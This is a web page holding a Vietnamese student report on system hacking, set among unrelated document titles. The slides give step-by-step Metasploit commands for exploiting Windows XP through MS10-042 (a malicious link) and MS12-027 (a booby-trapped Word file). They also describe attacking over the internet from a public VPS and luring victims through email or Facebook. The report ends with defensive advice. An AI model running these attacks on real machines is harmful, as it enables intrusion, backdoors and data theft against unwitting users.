Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )
Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )lamdapoet123
 
Xem tử vi miễn phí trực tuyến cho kết quả chính xác cùng luậ...
Xem tử vi miễn phí trực tuyến cho kết quả chính xác cùng luậ...Xem tử vi miễn phí trực tuyến cho kết quả chính xác cùng luậ...
Xem tử vi miễn phí trực tuyến cho kết quả chính xác cùng luậ...Xem Số Mệnh
 
Linh kiện điện tử - Điện tử số sáng tạo VN.pdf
Linh kiện điện tử - Điện tử số sáng tạo VN.pdfLinh kiện điện tử - Điện tử số sáng tạo VN.pdf
Linh kiện điện tử - Điện tử số sáng tạo VN.pdfXem Số Mệnh
 
TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...
TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...
TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...Nguyen Thanh Tu Collection
 
Thiết kế hệ thống điều khiển chỉnh lưu tích cực 1 pha
Thiết kế hệ thống điều khiển chỉnh lưu tích cực 1 phaThiết kế hệ thống điều khiển chỉnh lưu tích cực 1 pha
Thiết kế hệ thống điều khiển chỉnh lưu tích cực 1 phaAnhDngBi4
 
Ma trận - định thức và các ứng dụng trong kinh tế
Ma trận - định thức và các ứng dụng trong kinh tếMa trận - định thức và các ứng dụng trong kinh tế
Ma trận - định thức và các ứng dụng trong kinh tếngTonH1
 
Nhóm 10-Xác suất và thống kê toán-đại học thương mại
Nhóm 10-Xác suất và thống kê toán-đại học thương mạiNhóm 10-Xác suất và thống kê toán-đại học thương mại
Nhóm 10-Xác suất và thống kê toán-đại học thương mạiTruongThiDiemQuynhQP
 
Xem sim phong thủy luận Hung - Cát số điện thoại chính xác nhất.pdf
Xem sim phong thủy luận Hung - Cát số điện thoại chính xác nhất.pdfXem sim phong thủy luận Hung - Cát số điện thoại chính xác nhất.pdf
Xem sim phong thủy luận Hung - Cát số điện thoại chính xác nhất.pdfXem Số Mệnh
 
kỳ thi bác sĩ nội trú khóa 48, hướng dẫn
kỳ thi bác sĩ nội trú khóa 48, hướng dẫnkỳ thi bác sĩ nội trú khóa 48, hướng dẫn
kỳ thi bác sĩ nội trú khóa 48, hướng dẫnVitHong183894
 
Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...
Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...
Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...Xem Số Mệnh
 
Mạch điện tử - Điện tử số sáng tạo VN-new.pdf
Mạch điện tử - Điện tử số sáng tạo VN-new.pdfMạch điện tử - Điện tử số sáng tạo VN-new.pdf
Mạch điện tử - Điện tử số sáng tạo VN-new.pdfXem Số Mệnh
 

Último (20)

50 ĐỀ ĐỀ XUẤT THI VÀO 10 THPT SỞ GIÁO DỤC THANH HÓA MÔN TIẾNG ANH 9 CÓ TỰ LUẬ...
50 ĐỀ ĐỀ XUẤT THI VÀO 10 THPT SỞ GIÁO DỤC THANH HÓA MÔN TIẾNG ANH 9 CÓ TỰ LUẬ...50 ĐỀ ĐỀ XUẤT THI VÀO 10 THPT SỞ GIÁO DỤC THANH HÓA MÔN TIẾNG ANH 9 CÓ TỰ LUẬ...
50 ĐỀ ĐỀ XUẤT THI VÀO 10 THPT SỞ GIÁO DỤC THANH HÓA MÔN TIẾNG ANH 9 CÓ TỰ LUẬ...
 
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...
 
syllabus for the book "Tiếng Anh 6 i-Learn Smart World"
syllabus for the book "Tiếng Anh 6 i-Learn Smart World"syllabus for the book "Tiếng Anh 6 i-Learn Smart World"
syllabus for the book "Tiếng Anh 6 i-Learn Smart World"
 
đồ án thương mại quốc tế- hutech - KDQTK21
đồ án thương mại quốc tế- hutech - KDQTK21đồ án thương mại quốc tế- hutech - KDQTK21
đồ án thương mại quốc tế- hutech - KDQTK21
 
200 câu hỏi trắc nghiệm ôn tập PLDC.pdf
200 câu hỏi trắc nghiệm ôn tập  PLDC.pdf200 câu hỏi trắc nghiệm ôn tập  PLDC.pdf
200 câu hỏi trắc nghiệm ôn tập PLDC.pdf
 
ĐỀ CƯƠNG + TEST ÔN TẬP CUỐI KÌ 2 TIẾNG ANH 11 - GLOBAL SUCCESS (THEO CHUẨN MI...
ĐỀ CƯƠNG + TEST ÔN TẬP CUỐI KÌ 2 TIẾNG ANH 11 - GLOBAL SUCCESS (THEO CHUẨN MI...ĐỀ CƯƠNG + TEST ÔN TẬP CUỐI KÌ 2 TIẾNG ANH 11 - GLOBAL SUCCESS (THEO CHUẨN MI...
ĐỀ CƯƠNG + TEST ÔN TẬP CUỐI KÌ 2 TIẾNG ANH 11 - GLOBAL SUCCESS (THEO CHUẨN MI...
 
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoabài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa
 
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
 
vat li 10 Chuyen de bai 4 Xac dinh phuong huong.pptx
vat li 10  Chuyen de bai 4 Xac dinh phuong huong.pptxvat li 10  Chuyen de bai 4 Xac dinh phuong huong.pptx
vat li 10 Chuyen de bai 4 Xac dinh phuong huong.pptx
 
Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )
Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )
Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )
 
Xem tử vi miễn phí trực tuyến cho kết quả chính xác cùng luậ...
Xem tử vi miễn phí trực tuyến cho kết quả chính xác cùng luậ...Xem tử vi miễn phí trực tuyến cho kết quả chính xác cùng luậ...
Xem tử vi miễn phí trực tuyến cho kết quả chính xác cùng luậ...
 
Linh kiện điện tử - Điện tử số sáng tạo VN.pdf
Linh kiện điện tử - Điện tử số sáng tạo VN.pdfLinh kiện điện tử - Điện tử số sáng tạo VN.pdf
Linh kiện điện tử - Điện tử số sáng tạo VN.pdf
 
TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...
TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...
TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...
 
Thiết kế hệ thống điều khiển chỉnh lưu tích cực 1 pha
Thiết kế hệ thống điều khiển chỉnh lưu tích cực 1 phaThiết kế hệ thống điều khiển chỉnh lưu tích cực 1 pha
Thiết kế hệ thống điều khiển chỉnh lưu tích cực 1 pha
 
Ma trận - định thức và các ứng dụng trong kinh tế
Ma trận - định thức và các ứng dụng trong kinh tếMa trận - định thức và các ứng dụng trong kinh tế
Ma trận - định thức và các ứng dụng trong kinh tế
 
Nhóm 10-Xác suất và thống kê toán-đại học thương mại
Nhóm 10-Xác suất và thống kê toán-đại học thương mạiNhóm 10-Xác suất và thống kê toán-đại học thương mại
Nhóm 10-Xác suất và thống kê toán-đại học thương mại
 
Xem sim phong thủy luận Hung - Cát số điện thoại chính xác nhất.pdf
Xem sim phong thủy luận Hung - Cát số điện thoại chính xác nhất.pdfXem sim phong thủy luận Hung - Cát số điện thoại chính xác nhất.pdf
Xem sim phong thủy luận Hung - Cát số điện thoại chính xác nhất.pdf
 
kỳ thi bác sĩ nội trú khóa 48, hướng dẫn
kỳ thi bác sĩ nội trú khóa 48, hướng dẫnkỳ thi bác sĩ nội trú khóa 48, hướng dẫn
kỳ thi bác sĩ nội trú khóa 48, hướng dẫn
 
Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...
Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...
Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...
 
Mạch điện tử - Điện tử số sáng tạo VN-new.pdf
Mạch điện tử - Điện tử số sáng tạo VN-new.pdfMạch điện tử - Điện tử số sáng tạo VN-new.pdf
Mạch điện tử - Điện tử số sáng tạo VN-new.pdf
 

Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

  • 1. BÁO CÁO THỰC TẬP SYSTEM HACKING GVHD: Thầy Võ Đỗ Thắng SVTT: Trần Nguyễn Lộc
  • 2. MỤC LỤC Giới thiệu1 2 T 3 Tổng Kết Thực hiện
  • 3. Giới thiệu • Theo thống kê của công ty Bkav, từ đầu năm 2013 đến nay, tại Việt Nam đã có 2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có khoảng 300 website bị tấn công • Hiện nay, các thiết bị như máy tính PC, laptop, đều có kết nối mạng nội bộ hoặc kết nối Internet . Trên các thiết bị này, hầu hết cài đặt các phần mềm ứng dụng như IE, Microsoft Office, Adobe Reader ,…. và chạy hệ điều hành như Windows XP, Windows 7…
  • 4. Giới thiệu system hacking Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ chức Gồm những kỹ thuật lấy username, password dựa vào phần mềm cài trên hệ thống hoặc các dịch vụ từ xa của hệ điều hành Windows Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những log file hệ thống
  • 5. Quá trình tấn công vào một hệ thống Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong hệ thống. Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu ích, chính xác hơn Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất. Bước này yêu cầu chúng ta bẽ khóa mật khẩu đăng nhập của user. Hoặc bằng một cách nào khác, mục tiêu phải đạt tới là quyền truy cập vào hệ thống Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ user binh thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn công Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị trước malware, keylogger, rootkit…để chạy nó trên máy tính tấn côngHide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệtTracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tin có liên quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không khả năng bạn bị phát hiện là kẻ đột nhập là rất cao. Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ thuật như Footprinting, Social engineering, Enumeration, Google Hacking… đã được áp dụng cho mục đích truy tìm thông tin.
  • 6. Hệ điều hành Backtrack 5 R3 - Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện tại của nó (5), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 11.10. - Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm thâm nhập của chúng ta
  • 7. Phần mềm Metasploit • Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống phát hiện tấn công mạng. • Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS.
  • 8. Sơ đồ tổng quan hệ thống mạng LAN Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy tính trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình là chia sẻ tập tin, máy in, máy quét và một số thiết bị khác  .Tấn công mạng Lan
  • 9. CHUẨN BỊ  1 máy backtrack 5 R3 có địa chỉ IP: 172.16.0.9(máy tấn công).  1 máy win XP có địa chỉ IP 172.16.0.10(máy bị tấn công).
  • 10. Xâm nhập và khai thác Windows XP • Nhận dạng Lỗ hổng này có thể cho phép thực thi mã từ xa nếu người dùng xem một trang web thiết kế đặc biệt bằng cách sử dụng một trình duyệt web hoặc nhấp vào một liên kết thiết kế đặc biệt trong một thông báo e-mail. Khai thác lổ hổng Ms10-042
  • 11. • Thực hiện Xâm nhập và khai thác Windows XP Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole Từ dấu nhắc sử dụng lệnh: msf > search ms10_042 Copy đường dẫn, enter gõ use “dán đường dẫn vào” Gõ show options để thấy các options của lệnh. msf exploit(ms10_042_helpctr_xss_cmd_exec) > show options
  • 12.  Dùng lệnh set srvhost, lhost, exploit - Set srvhost 172.16.0.9 -> set địa chỉ IP của máy backtrack 5 R3 - Set lhost 172.16.0.9 -> set địa chỉ IP của máy backtrack 5 R3 - Lệnh exploit để bắt đầu xâm nhập trên máy nạn nhân.
  • 13.  Sau khi thực hiện lệnh exploit , thì sẽ tạo ra 1 đường link chứa mã độc , mà khi nạn nhân kích vào, thì lập tức sẽ nhiễm mã độc và lúc này backtrack 5 sẽ chiếm toàn quyền điều khiển trên máy bạn nhân.(việc lừa nạn nhận kích vào mã độc tùy vào khả năng của hacker như gửi mail hoặc gửi qua facebook …., tùy vào khả năng của mỗi người)
  • 14.  Tới bước này là ta có thể chiếm được toàn quyền điều khiển trên máy nạn nhân như: xem thông tin trên máy nạn nhân,thêm ,xóa ,sửa file, thư mục ….. trên máy nạn nhân.
  • 15.  Xem thông tin trên máy nạn nhân  Tạo thư mục backdoor thành công.
  • 16. Xâm nhập và khai thác Windows XP a) Mô tả: Mục tiêu của việc khai thác mã lỗi này là khai thác lỗ hổng của Microsoft office (word ) trên window. Một kẻ tấn công khai thác thành công lỗ hổng có thể lấy được quyền sử dụng giống như người dùng đăng nhập vào máy tính. Khai thác lổ hỗng ms12-027
  • 17.  Mở giao diện console của công cụ metasploit bằng dòng lệnh msfconsole.  Search mã lỗi ms12_027 bằng dòng lệnh :search ms12_027  Tiến hành khai thác mã lỗi bằng dòng lệnh : use exploit /windows/fileformat/ms12_027_mscomctl_bof.  Xem hệ điều hành có thể khai thác bởi mã lỗi ms12_027 b) Các bước tấn công
  • 18.  Tiến hành set filename và set lhost -Lệnh set filename : tạo ra file word có chứa mã độc -Lệnh set lhost : set địa chỉ IP của máy backtrack 5.
  • 19.  Sau khi tạo được mã độc là file word , ta tiến hành sao sao chép file word này lên máy tính nạn nhân bằng nhiều cách như email……Khi nạn nhân mở file word bị nhiễm mã độc, thì ta có thể chiếm được toàn quyền điều khiển trên máy nạn nhân, cụ thể là một sessions mới được tạo ra.
  • 20. -Xem thông tin về máy tính nạn nhân sau khi chiếm toàn quyền điều khiển. -Và có thể thực hiện được những lệnh tấn công khác mà mình muốn.
  • 21.  Khai thác lỗ hỗng window qua mạng internet a) Giới thiệu Honeypot  Honeypot là một hệ thống tài nguyên thông tin được xây dựng với mục đích giả dạng đánh lừa những kẻ sử dụng và xâm nhập không hợp pháp, thu hút sự chú ý của chúng, ngăn không cho chúng tiếp xúc với hệ thống thật. Hệ thống tài nguyên thông tin có nghĩa là Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào như là Mail Server, Domain Name Server, Web Server… Honeypot sẽ trực tiếp tương tác với tin tặc và tìm cách khai thác thông tin về tin tặc như hình thức tấn công, công cụ tấn công hay cách thức tiến hành thay vì bị tấn công.
  • 22. b) Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa qua Internet
  • 23.  Chúng ta – đóng vài trò là Attacker, cần chuẩn bị: - VPS có địa chỉ IP public, cài đặt sẵn công cụ Metasploit (download tại http://metasploit.org) đóng vai trò là một Honeypot trên mạng.
  • 24. c) Thực hiện khai thác mã lỗi  Khi thác lỗi ms10_042 trong windows xp -Mục đích của việc khai thác mã lỗi này là khai thác lỗi css trong help center của IE, sau khi khai thác thành công , ta có thể chiếm toàn quyền điều khiển trên máy nạn nhân. -Các bước tiến hành như sau: • Khởi động chương trình metasploit trên máy chủ vps .
  • 25.
  • 26. • Dùng lệnh search mã lỗi: để xem mã lỗi có toàn tại để khai thác hay không: Ở đây search 10_042
  • 27.  Dùng lệnh set srvhost ,lhost , exploit  Dùng lệnh srvhost 14.0.21.113 : để set địa chỉ ip của máy vps.  Dùng lệnh lhost 14.0.21.113 : để set địa chỉ ip của máy vps.  Dùng lệnh Exploit để thực thi mã đã cài đặt, lúc này 1 đường link chứa mã độc sẽ được tạo ra , và khi nạn nhân kích vào đường link này thì bị nhiễm mã độc và ta có thể chiếm toàn quyền điều khiển trên máy nạn nhân.
  • 28. • Đến đây ta chiếm được toàn quyền điều khiển trên máy nạn nhân Xem thông tin trên máy nạn nhân
  • 29. Tạo thư mục có tên là thư mục mới
  • 30. TỔNG KẾT • Mật khẩu phải được đặt nhiều hơn 8 ký tự và phải là tổng hợp giữa chữ hoa, chữ thường, số và ký tự đặc biệt để các chương trình khó dò ra • Không mở tập tin đính kèm thư điện tử có nguồn gốc không rõ ràng hoặc không tin cậy • Chắc chắn rằng bạn có và đã bật hệ thống tường lửa cho hệ thống của mình.